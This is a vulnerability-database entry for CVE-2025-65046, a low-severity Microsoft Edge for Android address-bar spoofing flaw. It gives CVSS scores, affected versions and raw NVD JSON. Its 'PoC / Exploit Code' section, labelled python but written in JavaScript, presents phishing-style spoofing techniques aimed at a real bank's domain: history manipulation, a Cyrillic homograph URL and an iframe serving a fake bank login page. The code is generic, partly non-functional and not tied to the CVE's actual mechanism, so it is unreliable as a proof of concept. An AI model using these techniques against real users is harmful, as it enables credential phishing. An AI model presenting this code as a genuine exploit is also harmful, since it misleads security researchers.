Security Vulnerability Report
中文
CVE-2025-65046 CVSS 3.1 LOW

CVE-2025-65046

Published: 2025-12-18 22:16:02
Last Modified: 2026-02-20 17:25:50

Description

Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:*:android:*:* - VULNERABLE
Microsoft Edge (Chromium-based) < 最新安全更新版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2025-65046 - Microsoft Edge Address Bar Spoofing // Note: This is a conceptual PoC for educational purposes only // Method 1: History manipulation technique function spoofURL() { const targetURL = 'https://www.bankofamerica.com'; const maliciousURL = 'https://malicious-site.com'; // Use history.pushState to manipulate browser history history.pushState({}, '', maliciousURL); // Trigger the spoof by navigating to target window.location.href = targetURL; } // Method 2: Using special characters/Unicode homograph attack const fakeBankURL = 'https://www.bаnkofamerica.com'; // Cyrillic 'а' instead of Latin 'a' // Method 3: Address bar overlay via service worker if ('serviceWorker' in navigator) { navigator.serviceWorker.register('/sw.js').then(registration => { // Service worker can intercept requests and manipulate responses console.log('Service Worker registered for URL spoofing'); }); } // Method 4: Using data: URLs or about:blank function injectContent() { const iframe = document.createElement('iframe'); iframe.src = 'about:blank'; document.body.appendChild(iframe); // Write content to the blank page while URL remains spoofed const doc = iframe.contentDocument || iframe.contentWindow.document; doc.open(); doc.write('<html><body><h1>Fake Bank Login Page</h1></body></html>'); doc.close(); } // Trigger the spoofing attack document.addEventListener('DOMContentLoaded', () => { spoofURL(); });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65046", "sourceIdentifier": "[email protected]", "published": "2025-12-18T22:16:01.750", "lastModified": "2026-02-20T17:25:50.093", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft Edge (Chromium-based) Spoofing Vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:*:android:*:*", "versionEndExcluding": "143.0.3650.88", "matchCriteriaId": "7969635F-7F65-46EB-BBE8-60B2EAB807CA"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-65046", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}